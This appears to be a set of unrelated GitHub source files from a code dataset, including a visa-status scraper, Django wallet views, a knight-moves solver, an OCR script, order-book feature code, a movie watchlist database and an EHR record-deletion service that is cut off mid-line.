data[\"ctl00_ToolkitScriptManager1_HiddenField\"]=\";;AjaxControlToolkit, Version=3.5.51116.0, Culture=neutral, PublicKeyToken=28f01b0e84b6d53e:en-US:2a06c7e2-728e-4b15-83d6-9b269fb7261e:de1feab2:f2c8e708:8613aea7:f9cec9bc:3202a5a2:a67c2700:720a52bf:589eaa30:ab09e3fe:87104b7c:be6fb298\"\n data[\"ctl00$ContentPlaceHolder1$Visa_Application_Type\"]=\"NIV\"\n data[\"__EVENTTARGET\"]=\"ctl00$ContentPlaceHolder1$btnSubmit\"\n data[\"ctl00$ToolkitScriptManager1\"]=\"ctl00$ContentPlaceHolder1$UpdatePanel1|ctl00$ContentPlaceHolder1$btnSubmit\"\n data[\"LBD_BackWorkaround_c_status_ctl00_contentplaceholder1_defaultcaptcha\"]=\"1\"\n data[\"__EVENTARGUMENT\"]=\"\"\n data[\"__LASTFOCUS\"]=\"\"\n return data\n\ndef query_ceac_state(loc, case_no, passport_number, surname, data=None):\n if data is None:\n data = get_post_data()\n data[\"ctl00$ContentPlaceHolder1$Location_Dropdown\"]=loc\n data[\"ctl00$ContentPlaceHolder1$Visa_Case_Number\"]=case_no\n data[\"ctl00$ContentPlaceHolder1$Passport_Number\"] = passport_number\n data[\"ctl00$ContentPlaceHolder1$Surname\"] = surname\n\n resp = s.post(URL,data)\n soup = BeautifulSoup(resp.text, features=\"html.parser\")\n\n error_tag = soup.find(id=\"ctl00_ContentPlaceHolder1_ValidationSummary1\")\n if error_tag is None:\n # Request Rejected\n # Second captcha and just retry\n return ERR_CAPTCHA, None\n\n error_text = error_tag.text.strip()\n if error_text:\n return error_text, None\n\n error_text = soup.find(id=\"ctl00_ContentPlaceHolder1_lblError\").text\n if error_text:\n return error_text, None\n status = soup.find(id=\"ctl00_ContentPlaceHolder1_ucApplicationStatusView_lblStatus\").text\n caseno = soup.find(id=\"ctl00_ContentPlaceHolder1_ucApplicationStatusView_lblCaseNo\").text\n SubmitDate = soup.find(id=\"ctl00_ContentPlaceHolder1_ucApplicationStatusView_lblSubmitDate\").text\n StatusDate = soup.find(id=\"ctl00_ContentPlaceHolder1_ucApplicationStatusView_lblStatusDate\").text\n Message = 
soup.find(id=\"ctl00_ContentPlaceHolder1_ucApplicationStatusView_lblMessage\").text\n assert caseno == case_no \n return (status,SubmitDate,StatusDate,Message), soup\n\n\ndef query_ceac_state_safe(loc, case_no, info, soup=None):\n #decrypt addition_info by RSA\n try:\n plaintext = private_key.decrypt(\n base64.b64decode(info),\n padding.OAEP(\n mgf=padding.MGF1(algorithm=hashes.SHA256()),\n algorithm=hashes.SHA256(),\n label=None\n )\n )\n passport_number, surname = plaintext.decode().split(\",\")\n except Exception as e:\n return ERR_DECRYPT, None\n \n for _ in range(5):\n try:\n data = get_post_data(soup)\n result, soup = query_ceac_state(loc, case_no, passport_number, surname, data)\n logger.info(\"Info!,%s-%s: %s\",loc, case_no, result)\n except Exception as e:\n import traceback\n traceback.print_exc()\n logger.error(\"Error!,%s-%s: %s\",loc, case_no, e)\n return str(e), None\n if result != ERR_CAPTCHA:\n break\n else:\n time.sleep(1)\n return result, soup\n\n\ndef main_handler(req):\n ret = {}\n soup = None\n for loc, case_no, info in req:\n result, soup = query_ceac_state_safe(loc, case_no, info, soup)\n ret[case_no] = result\n return json.dumps(ret)\n\n\nfrom http.server import HTTPServer, BaseHTTPRequestHandler\n\nclass RequestProxyHandler(BaseHTTPRequestHandler):\n '''\n This class is used to handle the request from API Gateway to unwarp the request\n the request body is a json string, which contains json of the RAW request.\n\n Example of warpped request:\n POST /event-invoke HTTP/1.1\n Host: 11.148.165.112:10217\n User-Agent: Go-http-client/1.1\n Content-Length: 495\n Accept-Encoding: gzip\n Content-Type: application/json\n X-Forwarded-For: 11.163.0.86\n X-Real-Ip: 11.163.0.86\n X-Scf-Appid: 1252245989\n X-Scf-Memory: 512\n X-Scf-Name: ceac-serverless\n X-Scf-Namespace: default\n X-Scf-Region: na-siliconvalley\n X-Scf-Request-Id: 3b21a413-6e6a-11ee-b2ba-52540008c7f7\n X-Scf-Timeout: 300000\n X-Scf-Uin: 100000090134\n X-Scf-Version: $LATEST\n Connection: close\n\n Formated Body of warpped request:\n {\n \"body\": \"\",\n \"headers\": {\n \"accept\": \"text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8\",\n \"accept-encoding\": \"gzip, deflate, br\",\n \"accept-language\": \"en-US,en;q=0.7,zh;q=0.3\",\n \"upgrade-insecure-requests\": \"1\",\n \"user-agent\": \"Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0\"\n },\n \"httpMethod\": \"GET\",\n \"path\": \"/\",\n \"queryString\": {}\n }\n '''\n\n def do_POST(self):\n\n playload_raw = self.rfile.read(int(self.headers[\"Content-Length\"]))\n playload = json.loads(playload_raw)\n\n if playload[\"httpMethod\"] != \"POST\":\n self.send_response(400)\n self.send_header(\"Content-type\", \"text/html\")\n self.end_headers()\n self.wfile.write(b\"Only support POST!\")\n self.wfile.flush()\n return\n \n event = json.loads(playload[\"body\"])\n ret = main_handler(event)\n\n self.send_response(200)\n self.send_header(\"Content-type\", \"application/json\")\n self.end_headers()\n self.wfile.write( ret.encode() )\n self.wfile.flush()\n\n\ndef run(server_class=HTTPServer, handler_class=RequestProxyHandler):\n server_address = ('', 9000)\n httpd = server_class(server_address, handler_class)\n httpd.serve_forever()\n\nif __name__ == \"__main__\":\n logging.basicConfig(level=logging.INFO)\n run()\n\n# def test():\n# logging.basicConfig(level=logging.INFO)\n# loc = \"BEJ\"\n# case_no = \"AA00A38G49\"\n# info = 
\"vCGK/uopJta8UicG223ySZ6OnzYUp3dZAUTFw/Jzi9VulsVY1CNUy2NOZ4Bl2859tPu68nvWKVuWAHbPHfwPXpsshiWBCdwsdfFfC7GnrtERvdK8boghJ9m/7QStJz/rIQEHTw5K0GI7OY2XGbuXjB85I9cbcA5ppSfZuSKxYBkq4+vk9nMGOvsMEX09Bg4BqFhWSNkW/pgdm2jntFgT6Xzi00e1mPWv8chdgEiqhmp5C/tJLkcu9A5KqVTnlIRan3ytMkMIaslerqrKggMPtjBeNwCTlOY/9lyyYOsV8qK/qFjf2CtPL2TFaPHycIOKLP3caB0F2/+d/CD3PF+IRQ==\"\n# print(query_ceac_state_safe(loc, case_no, info))\n\n# if __name__ == \"__main__\":\n# test()","repo_name":"yuzeming/CEACStatTracker","sub_path":"CEAC-serverless/index.py","file_name":"index.py","file_ext":"py","file_size_in_byte":8934,"program_lang":"python","lang":"en","doc_type":"code","stars":25,"dataset":"github-code","pt":"76"} +{"seq_id":"73950645684","text":"#2106 양다연\n\nfrom animal import 동물\n\nclass 돼지(동물):\n def __init__(self, name):\n super().__init__(name)\n self.다리수 = 4\n self.특징 = \"돼지코\"\n self.울음소리 = \"꿀꿀\"\n\n def __str__(self):\n return super().__str__() + f', 특징: {self.특징}, 다리수: {self.다리수}개'\n\nif __name__ == '__main__':\n 동물2 = 돼지(\"저팔계\")\n 동물2.울다()\n print(동물2)\n\n#2106 양다연","repo_name":"yday05506/ProgrammingPython","sub_path":"2106 양다연_수행평가/pig.py","file_name":"pig.py","file_ext":"py","file_size_in_byte":461,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"76"} +{"seq_id":"19050382904","text":"from django.shortcuts import render,redirect\nfrom django.views.generic.base import View\nfrom email import message\nfrom .forms import *\nfrom rest_framework import views\nfrom rest_framework.response import Response\n\n# Create your views here\ndef home_page(request):\n return render(request,\"Wallet/index.html\")\n\ndef register_customer(request):\n if request.method=='POST':\n form=CustomerRegistrationForm(request.POST)\n if form.is_valid():\n form.save()\n else:\n form=CustomerRegistrationForm()\n return render(request,\"Wallet/register_customer.html\",{\"form\":form})\n\ndef customer_profile(request,id):\n customers=Customer.objects.get(id=id)\n return render(request,\"Wallet/customer_profile.html\",{\"customers\":customers })\ndef edit_customer(request,id):\n customer=Customer.objects.get(id=id)\n if request.method =='POST':\n form=CustomerRegistrationForm(request.POST,instance=customer)\n if form.is_valid():\n form.save()\n return redirect(\"customerProfile\",id=customer.id)\n else:\n form=CustomerRegistrationForm(instance=customer)\n return render(request,\"Wallet/edit_customer.html\",{\"forms\":form})\n\nclass SearchCustomer(View):\n model = Customer\n template_name = 'Wallet/list_customers.html'\n\n def get(self,request):\n customers=Customer.objects.all()\n customer_found=request.GET.get('customer_found',None) #request takes form as customer_found \n if customer_found:\n result=Customer.objects.filter(first_name__contains=customer_found) #filter from database and assign it tothe request \n context={'Customers':result}\n return render(request, self.template_name,context) #return result\n context={'Customers':customers}\n return render(request, self.template_name,context) \n\ndef register_account(request):\n if request.method==\"POST\":\n form_account=CustomerAccountForm(request.POST)\n if form_account.is_valid():\n form_account.save()\n else:\n form_account=CustomerAccountForm()\n return render(request,'Wallet/list_accounts.html',{\"form\":form_account} )\n\ndef list_accounts(request):\n accounts=Account.objects.all()\n return render(request,'Wallet/list_accounts.html',{\n \"accounts\":accounts})\n\ndef account_profile(request,id):\n account=Account.objects.get(id=id)\n return 
render(request,\"Wallet/account_profile.html\",{\"accounts\":account})\n\ndef edit_account(request,id):\n account=Account.objects.get(id=id)\n if request.method == \"POST\":\n form=CustomerAccountForm(request.POST,instance=account)\n if form.is_valid():\n form.save()\n return redirect(\"accountProfile\",id=account.id)\n else:\n form=CustomerAccountForm(instance=account)\n return render(request,\"Wallet/edit_account.html\",{\"forms\":form})\n\ndef register_wallet(request):\n if request.method==\"POST\":\n form_wallet=CustomerWalletForm(request.POST)\n if form_wallet.is_valid():\n form_wallet.save()\n else:\n form_wallet=CustomerWalletForm()\n return render(request,\"Wallet/customer_wallet.html\", {\"wallet\":form_wallet} )\n\ndef wallet_profile(request,id):\n wallet=Wallet.objects.get(id=id)\n return render(request,\"Wallet/account_profile.html\",{\"wallets\":wallet})\ndef edit_wallet(request,id):\n wallet=Wallet.objects.get(id=id)\n if request.method==\"POST\":\n form=CustomerWalletForm(request.POST,instance=wallet)\n if form.is_valid():\n form.save()\n return redirect(\"walletProfile\",id=wallet.id)\n else:\n form=CustomerWalletForm(instance=wallet)\n return render(request,\"Wallet/edit_wallet.html\",{\"forms\":form})\n\n\ndef list_wallet(request):\n wallet=Wallet.objects.all()\n return render(request,\"wallet/list_wallets.html\",{\"wallet\":wallet})\n\ndef register_transaction(request):\n if request.method==\"POST\":\n form_transact=CustomerTransactionForm(request.POST)\n if form_transact.is_valid():\n form_transact.save()\n else:\n form_transact=CustomerTransactionForm()\n return render(request,\"Wallet/transaction.html\", {\"transact\":form_transact})\n\ndef list_transaction(request):\n transactions=Transaction.objects.all()\n return render(request,\"Wallet/list_transactions.html\",{\"transactions\":transactions})\n\ndef register_card(request):\n card_form=CustomerCardForm()\n if request.method==\"POST\":\n card_form=CustomerCardForm(request.POST)\n if card_form.is_valid():\n card_form.save()\n else:\n card_form=CustomerCardForm()\n return render(request,\"Wallet/card.html\",{\"card\":card_form})\ndef transaction_profile(request,id):\n transaction=Transaction.objects.get(id=id)\n return render(request,\"Wallet/transaction_profile.html\",{\"transactions\":transaction})\ndef edit_transaction(request,id):\n transaction=Transaction.objects.get(id=id)\n if request.method==\"POST\":\n form=CustomerTransactionForm(request.POST,instance=transaction)\n if form.is_valid():\n form.save()\n return redirect(\"transactionProfile\",id=transaction.id)\n else:\n form=CustomerTransactionForm(instance=transaction)\n return render(request,\"Wallet/edit_transaction.html\",{\"forms\":form})\n \ndef list_card(request):\n card=Card.objects.all()\n return render(request,\"Wallet/list_cards.html\",{\"cards\":card})\ndef card_profile(request,id):\n card=Card.objects.get(id=id)\n return render(request,\"Wallet/card_profile.html\",{\"cards\":card})\n\ndef edit_card(request,id):\n card=Card.objects.get(id=id)\n if request.method==\"POST\":\n form=CustomerCardForm(request.POST,instance=card)\n if form.is_valid():\n form.save()\n return redirect(\"cardProfile\",id=card.id)\n else:\n return render(request,\"Wallet/edit_card.html\",{\"forms\":form})\n\ndef register_thirdparty(request):\n if request.method==\"POST\":\n thirdparty_form=ThirdPartyForm(request.POST)\n if thirdparty_form.is_valid():\n thirdparty_form.save()\n else:\n thirdparty_form=ThirdPartyForm()\n return 
render(request,\"Wallet/thirdparty.html\",{\"third\":thirdparty_form})\n\ndef list_thirdparty(request):\n thirds=ThirdParty.objects.all()\n return render (request,'Wallet/list_thirdparties.html',{\"thirdpartys\":thirds})\n\ndef register_notification(request):\n if request.method==\"POST\":\n form_notify=CustomerNotificationForm(request.POST)\n if form_notify.is_valid():\n form_notify.save()\n else:\n form_notify=CustomerNotificationForm()\n return render(request,\"Wallet/notification.html\",{\"notify\":form_notify})\n\ndef notification_list(request):\n notification=Notification.objects.all()\n return render (request,'Wallet/list_notifications.html',{\"notifications\":notification})\n\ndef register_loan(request):\n if request.method==\"POST\":\n loan_form=LoanForm(request.POST)\n if loan_form.is_valid():\n loan_form.save()\n else:\n loan_form=LoanForm()\n return render(request,\"Wallet/loan.html\",{\"loan\":loan_form} )\n\ndef list_loan(request):\n loan=Loan.objects.all()\n return render(request,'Wallet/list_loan.html',{\"loans\":loan})\n\ndef register_reward(request):\n if request.method==\"POST\":\n reward_form=RewardForm(request.POST)\n if reward_form.is_valid():\n reward_form.save()\n else:\n reward_form=RewardForm()\n return render(request,\"Wallet/transaction_reward.html\",{\"reward\":reward_form}\n )\n\ndef list_reward(request):\n reward=Reward.objects.all()\n return render(request,\"Wallet/list_rewards.html\",{\"rewards\":reward})\n\ndef register_receipt(request):\n if request.method==\"POST\":\n receipt_form=TransactionRecieptForm(request.POST)\n if receipt_form.is_valid():\n receipt_form.save()\n else:\n receipt_form=TransactionRecieptForm()\n return render(request,\"Wallet/transaction_reciept.html\", {\"receipt\":receipt_form})\n\ndef list_receipts(request):\n reciept=Reciept.objects.all()\n return render(request,\"Wallet/list_reciepts.html\",{\"receipts\":reciept})\n\ndef receipt_profile(request,id):\n reciept=Reciept.objects.get(id=id)\n return render(request,\"Wallet/reciept_profile.html\",{\"reciepts\":reciept})\n\ndef edit_receipts(request,id):\n receipt=Reciept.objects.get(id=id)\n if request.method==\"POST\":\n form=TransactionRecieptForm(request.POST,instance=receipt)\n if form.is_valid():\n form.save()\n return redirect(\"receiptProfile\",id=receipt.id)\n else:\n form=TransactionRecieptForm(instance=receipt)\n return render(request,\"Wallet/edit_reciept.html\",{\"forms\":form})\n ","repo_name":"prudenceAhimbisibwe/Digital-Wallet","sub_path":"Wallet/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":8798,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"76"} +{"seq_id":"70271510325","text":"\"\"\"\nМодуль для нахождения минимального кол-ва ходов для одного коня.\n\nИспользуется подсчета минимального кол-ва ходов в случае, если по шахматной доске ходит один конь,\nна основании данных, полученних в модуле input_data (координаты двух точек)\n\nФ-я knight_move() - нахождение кол-ва ходов\n\"\"\"\n\n\ndef knight_move(start: tuple[int, int], finish: tuple[int, int]) -> int:\n \"\"\"\n Эта функция считает количество ходов, необходимое коню, чтобы\n добраться из одной клетки шахматной доски до другой.\n\n :param start: кортеж (два целых числа - начальная координата коня)\n :param finish: кортеж (два целых числа - конечная координата коня)\n :return: целое число (кол-во ходов, которое необходимое сделать коню)\n\n >>> knight_move((1,1), (1,1))\n 0\n >>> knight_move((1,2), (6,4))\n 3\n \"\"\"\n step = [[100 for _ in 
range(0,13)] for _ in range(0,13)]\n step[start[0]+1][start[1]+1] = 0\n for _ in range(0,9):\n for i in range(2, 10):\n for j in range(2, 10):\n if step[i][j] > 0:\n step[i][j] = min(step[i+2][j+1], step[i-2][j-1],\n step[i-1][j-2], step[i+1][j+2],\n step[i+2][j-1], step[i-2][j+1],\n step[i+1][j-2], step[i-1][j+2])+1\n answer = step[finish[0]+1][finish[1]+1]\n return answer\n","repo_name":"green1937/VVPD6","sub_path":"package/knight_move.py","file_name":"knight_move.py","file_ext":"py","file_size_in_byte":1806,"program_lang":"python","lang":"ru","doc_type":"code","stars":0,"dataset":"github-code","pt":"76"} +{"seq_id":"36813945918","text":"import glob\nimport easyocr\nimport cv2\nimport numpy as np\nfrom matplotlib import pyplot as plt\nfrom PIL import Image as PILImage\nfrom wand.image import Image\nimport io\nimport os\n# Imports the Google Cloud client library\nfrom google.cloud import vision\nfrom AVALIA_TEXTO import verifica_conformidade_pepsi\n\nos.environ['GOOGLE_APPLICATION_CREDENTIALS'] = r' '\n\n#FUNCAO API GOOGLE VISION\ndef detect_text_only(path):\n \"\"\"Detects text in the file.\"\"\"\n from google.cloud import vision\n import io\n client = vision.ImageAnnotatorClient()\n\n with io.open(path, 'rb') as image_file:\n content = image_file.read()\n\n image = vision.Image(content=content)\n\n response = client.text_detection(image=image)\n texts = response.text_annotations \n \n if response.error.message:\n raise Exception(\n '{}\\nFor more info on error messages, check: '\n 'https://cloud.google.com/apis/design/errors'.format(\n response.error.message))\n \n if len(texts)>0:\n\n vertices = (['({},{})'.format(vertex.x, vertex.y)\n for vertex in texts[0].bounding_poly.vertices]) \n return vertices\n\n else:\n return \"Impossível Identificar\"\n\n\n\n\nimg_path = './V154/Pepsi/TRATADO/denoised_amostra6_5.png'\nimg = cv2.imread(img_path)\nvertices = detect_text_only(img_path)\n\nx1 = int(vertices[0][1:4])\ny1 = int(vertices[0][5:8])\nx2 = int(vertices[2][1:4])\ny2 = int(vertices[2][5:8])\n\ntop_left = (x1,y1)\nbottom_right = (x2,y2)\n\nprint(top_left)\nprint(bottom_right)\n\nimg = cv2.rectangle(img, top_left, bottom_right, (0,255,0), 2)\n\ncv2.imshow(\"resultado\", img)\n\ncv2.waitKey(0)\n","repo_name":"GabSouza98/tcc","sub_path":"GoogleVisionAPI_DetectText.py","file_name":"GoogleVisionAPI_DetectText.py","file_ext":"py","file_size_in_byte":1661,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"76"} +{"seq_id":"35743656649","text":"import dask\nimport numpy as np\nimport pandas as pd\n\n\n@dask.delayed\ndef extract_features(orderbook_file_path: str) -> pd.DataFrame:\n \"\"\"\n Given the orderbook file path, this function extracts\n key information for computing micro price predictions.\n First, it calculates bid-ask spreaad, mid price, bid-ask imbalance.\n Note that this function resamples above quantities by 1 second frequency.\n\n Args:\n orderbook_file_path (str): orderbook_file path\n\n Returns:\n pd.DataFrame: a dataframe containing necessary quantities.\n \"\"\"\n df = pd.read_csv(orderbook_file_path)[\n [\n \"timestamp\",\n \"asks[0].price\",\n \"bids[0].price\",\n \"asks[0].amount\",\n \"bids[0].amount\",\n ]\n ]\n\n # calculate mid price and bidask spread\n df[\"mid_price\"] = (df[\"asks[0].price\"] + df[\"bids[0].price\"]) / 2\n df[\"ba_spread\"] = np.round((df[\"asks[0].price\"] - df[\"bids[0].price\"]), 5)\n df[\"imbalance\"] = df[\"bids[0].amount\"] / (\n df[\"bids[0].amount\"] + df[\"asks[0].amount\"]\n )\n\n df[\"timestamp\"] 
= pd.to_datetime(df[\"timestamp\"] / 1000, unit=\"ms\")\n\n # convert timestamp to datetime format\n df = df[[\"timestamp\", \"mid_price\", \"ba_spread\", \"imbalance\"]].set_index(\"timestamp\")\n\n # resample by 1second frequency\n df = df.resample(\"1s\").last().ffill()\n return df\n\n\n@dask.delayed\ndef extract_quotes(trade_file_path: str) -> pd.DataFrame:\n df = pd.read_csv(trade_file_path)[\n [\"timestamp\", \"ask_price\", \"bid_price\", \"ask_amount\", \"bid_amount\"]\n ]\n df[\"timestamp\"] = pd.to_datetime(df[\"timestamp\"] / 1000, unit=\"ms\")\n return df.set_index(\"timestamp\")\n\n\n@dask.delayed\ndef extract_trades(trade_file_path: str) -> pd.DataFrame:\n df = pd.read_csv(trade_file_path)[[\"timestamp\", \"side\", \"price\", \"amount\"]]\n df[\"timestamp\"] = pd.to_datetime(df[\"timestamp\"] / 1000, unit=\"ms\")\n return df.set_index(\"timestamp\")\n\n\ndef symmetrize_data(\n df_feature: pd.DataFrame,\n numSpreads: int = 4,\n numImbalance: int = 4,\n numdM: int = 2,\n symmetrize: bool = True,\n) -> pd.DataFrame:\n \"\"\"_summary_\n\n Args:\n df_feature (pd.DataFrame): _description_\n numSpreads (int, optional): _description_. Defaults to 4.\n numImbalance (int, optional): _description_. Defaults to 4.\n numdM (int, optional): _description_. Defaults to 2.\n symmetrize (bool, optional): _description_. Defaults to True.\n\n Returns:\n pd.DataFrame: _description_\n \"\"\"\n df_signal = df_feature.copy(deep=True)\n tick_size = df_signal.ba_spread[df_signal.ba_spread != 0].min()\n\n # discretize bidask spread then get next time's bidask spread\n # discretize imbalance and get next imbalance\n df_signal = df_signal[df_signal.ba_spread <= numSpreads * tick_size]\n df_signal[\"ba_spread\"] = np.round(df_signal[\"ba_spread\"].div(tick_size)).astype(int)\n df_signal[\"imbalance\"] = pd.cut(\n df_feature[\"imbalance\"],\n bins=np.arange(numImbalance + 1) / numImbalance,\n labels=np.arange(1, numImbalance + 1),\n ).astype(int)\n\n # calculate change in mid price\n # include data that bidask spread is within 0.2, same goes for\n # mid price change\n df_signal[\"mid_chg\"] = (\n np.round(df_signal[\"mid_price\"].diff().div(tick_size))\n .mul(tick_size)\n .shift(\n -1,\n )\n )\n df_signal = df_signal[abs(df_signal.mid_chg) <= tick_size * numdM]\n\n df_signal[\"next_ba_spread\"] = df_signal[\"ba_spread\"].shift(-1)\n df_signal[\"next_imbalance\"] = df_signal[\"imbalance\"].shift(-1)\n df_signal = df_signal.dropna()\n\n if symmetrize: # make symmetric data\n df_symmetric = df_signal.copy(deep=True)\n df_symmetric[\"imbalance\"] = numImbalance - df_signal[\"imbalance\"] + 1\n df_symmetric[\"next_imbalance\"] = numImbalance - df_signal[\"next_imbalance\"] + 1\n df_symmetric[\"mid_chg\"] = -df_signal[\"mid_chg\"]\n df = pd.concat([df_signal, df_symmetric])\n else:\n df = df_signal\n\n df[[\"next_ba_spread\", \"next_imbalance\"]] = df[\n [\"next_ba_spread\", \"next_imbalance\"]\n ].astype(int)\n return df.dropna()\n","repo_name":"KibeomKimMFE/FBD_Project","sub_path":"src/preprocessing.py","file_name":"preprocessing.py","file_ext":"py","file_size_in_byte":4160,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"76"} +{"seq_id":"9452317638","text":"import datetime\nimport sqlite3\n\nCREATE_MOVIES_TABLE = \"\"\"CREATE TABLE IF NOT EXISTS movies (\n id INTEGER PRIMARY KEY,\n title TEXT,\n release_timestamp REAL \n);\"\"\"\n\n# There i can add more info about users (their emails, locations etc.)\nCREATE_USERS_TABLE = \"\"\"CREATE TABLE IF NOT EXISTS users(\n 
username TEXT PRIMARY KEY\n);\"\"\"\n\n# With a foreign key constraint we tell SQL that columns here are referencing other columns\nCREATE_WATCHED_TABLE = \"\"\"CREATE TABLE IF NOT EXISTS watched (\n user_username TEXT,\n movie_id INTEGER,\n FOREIGN KEY (user_username) REFERENCES users(username)\n FOREIGN KEY (movie_id) REFERENCES movies(id)\n);\"\"\"\n\nINSERT_MOVIES = \"INSERT INTO movies (title, release_timestamp) VALUES (?, ?);\"\nINSERT_USER = \"INSERT INTO users (username) VALUES (?)\"\nDELETE_MOVIE = \"DELETE FROM movies WHERE title = ?;\"\nSELECT_ALL_MOVIES = \"SELECT * FROM movies;\"\nSELECT_UPCOMING_MOVIES = \"SELECT * FROM movies WHERE release_timestamp > ?;\"\nSELECT_WATCHED_MOVIES = \"\"\"SELECT movies.* FROM movies\nJOIN watched ON movies.id = watched.movie_id\nJOIN users ON users.username = watched.user_username\nWHERE users.username = ?;\"\"\"\nINSERT_WATCHED_MOVIE = \"INSERT INTO watched (user_username, movie_id) VALUES (?, ?)\"\nSET_MOVIE_WATCHED = \"UPDATE movies SET watched = 1 WHERE title = ?;\"\nSEARCH_MOVIES = \"SELECT * FROM movies WHERE title LIKE ?;\"\nCREATE_RELEASE_INDEX = \"CREATE INDEX IF NOT EXISTS idx_movies_release ON movies(release_timestamp);\"\n\nconnection = sqlite3.connect(\"data.db\") # This allows us to connect to database and creates data.db\n\n\ndef create_tables():\n with connection:\n connection.execute(CREATE_MOVIES_TABLE)\n connection.execute(CREATE_USERS_TABLE)\n connection.execute(CREATE_WATCHED_TABLE)\n connection.execute(CREATE_RELEASE_INDEX)\n\n\ndef add_user(username):\n with connection:\n connection.execute(INSERT_USER, (username,))\n\n\ndef add_movie(title, release_timestamp):\n with connection:\n connection.execute(INSERT_MOVIES, (title, release_timestamp))\n\n\ndef get_movies(upcoming=False): # upcoming = True if we want upcoming, False if we want All movies\n with connection:\n cursor = connection.cursor()\n if upcoming:\n today_timestamp = datetime.datetime.today().timestamp()\n cursor.execute(SELECT_UPCOMING_MOVIES, (today_timestamp,))\n else:\n cursor.execute(SELECT_ALL_MOVIES)\n return cursor.fetchall()\n\n\ndef search_movies(search_term):\n with connection:\n cursor = connection.cursor()\n cursor.execute(SEARCH_MOVIES, (f\"%{search_term}%\",)) # This way it will show \"Matrix\" even if only \"Mat\" typed\n return cursor.fetchall()\n\n\ndef watch_movie(username, movie_id):\n with connection:\n connection.execute(INSERT_WATCHED_MOVIE, (username, movie_id))\n\n\ndef get_watched_movies(username):\n with connection:\n cursor = connection.cursor()\n cursor.execute(SELECT_WATCHED_MOVIES, (username,))\n return cursor.fetchall()\n","repo_name":"Luksos9/PythonSQL","sub_path":"MovieWatchList/moviesdatabase.py","file_name":"moviesdatabase.py","file_ext":"py","file_size_in_byte":3007,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"76"} +{"seq_id":"39282133898","text":"import git\nimport os\n\n\nclass AvatarRepo(object):\n def __init__(self, directory, repo):\n # Ensure directory exists\n if not os.path.exists(directory):\n print('Creating directory: \"{}\"'.format(directory))\n os.makedirs(directory)\n\n self._directory = self._get_repo_dir(directory, repo)\n self._repo = repo\n self._isvalid = False\n\n def getpath(self):\n return self._directory\n\n def clone(self):\n success = False\n\n print('Cloning repo {}'.format(self._repo))\n\n try:\n git.Repo.clone_from(self._repo, self._directory)\n success = True\n except git.exc.GitCommandError:\n # Assume already cloned\n success = True\n pass\n\n 
if success:\n self._isvalid = True\n return True\n\n self._isvalid = False\n print('Failed to clone repo')\n return False\n\n def isvalid(self):\n return self._isvalid\n\n @staticmethod\n def _get_repo_dir(directory, repo):\n name = os.path.basename(repo)\n\n # Remove trailing '.git'\n if name[-4:] == '.git':\n name = name[:-4]\n\n return os.path.join(directory, name)\n","repo_name":"garbear/avatarbuilder","sub_path":"avatarbuilder/AvatarRepo.py","file_name":"AvatarRepo.py","file_ext":"py","file_size_in_byte":1219,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"76"} +{"seq_id":"15674984349","text":"import os\n\nimport pg8000.native\n\nfrom loguru import logger\nfrom exceptions.deletion_verification_exception import DeletionVerificationException\nfrom utilities.database_utilities import get_ehr_repository_database_parameters\n\n\nclass DatabaseService:\n def __init__(self):\n self._ehr_repository_database_parameters = get_ehr_repository_database_parameters()\n self._deletion_interval = os.environ[\"DELETION_INTERVAL\"]\n\n def fetch_all_eligible_records(self) -> list[str]:\n found_records = []\n sql_query = (\"SELECT hr.conversation_id \"\n \"FROM health_records hr \"\n \"WHERE hr.deleted_at IS NOT NULL \"\n f\"AND hr.deleted_at <= (now() - interval '{self._deletion_interval}') \"\n \"GROUP BY hr.conversation_id;\")\n\n with pg8000.native.Connection(**self._ehr_repository_database_parameters.connection_dictionary) as connection:\n for row in connection.run(sql_query):\n found_records.append(str(row[0]))\n\n found_records_length = len(found_records)\n\n if found_records_length > 0:\n logger.info(f\"Found {found_records_length} health records eligible for deletion.\")\n return found_records\n else:\n logger.warning(\"No eligible records were found.\")\n return []\n\n def delete_records_from_ehr_repo_database(self, conversation_ids: list[str]) -> None:\n if len(conversation_ids) == 0:\n return\n\n formatted_conversation_ids = self._format_conversation_ids(conversation_ids)\n\n delete_health_records_sql_query = (\"DELETE FROM health_records hr \"\n \"WHERE hr.conversation_id \"\n f\"IN ({formatted_conversation_ids});\")\n\n delete_messages_sql_query = (\"DELETE FROM messages m \"\n \"WHERE m.conversation_id \"\n f\"IN ({formatted_conversation_ids});\")\n\n with pg8000.native.Connection(**self._ehr_repository_database_parameters.connection_dictionary) as connection:\n connection.run(delete_health_records_sql_query)\n connection.run(delete_messages_sql_query)\n\n self._verify_ehr_repository_records_deleted(conversation_ids)\n\n def _verify_ehr_repository_records_deleted(self, conversation_ids: list[str]) -> None:\n formatted_conversation_ids = self._format_conversation_ids(conversation_ids)\n sql_query = (\"SELECT m.conversation_id \"\n \"FROM messages m \"\n \"WHERE m.conversation_id \"\n f\"IN ({formatted_conversation_ids});\")\n\n with pg8000.native.Connection(**self._ehr_repository_database_parameters.connection_dictionary) as connection:\n unsuccessful_ids = connection.run(sql_query)\n\n if len(unsuccessful_ids) != 0:\n raise DeletionVerificationException(\n \"The following Conversation ID(s) still exist within the EHR Repository database: \"\n f\"{unsuccessful_ids} - these likely will require a manual deletion.\"\n )\n\n else:\n logger.info(f\"Successfully deleted all record(s) for Conversation ID(s) {conversation_ids}.\")\n\n @classmethod\n def _format_conversation_ids(cls, conversation_ids: list[str]):\n formatted_conversation_ids = ', 
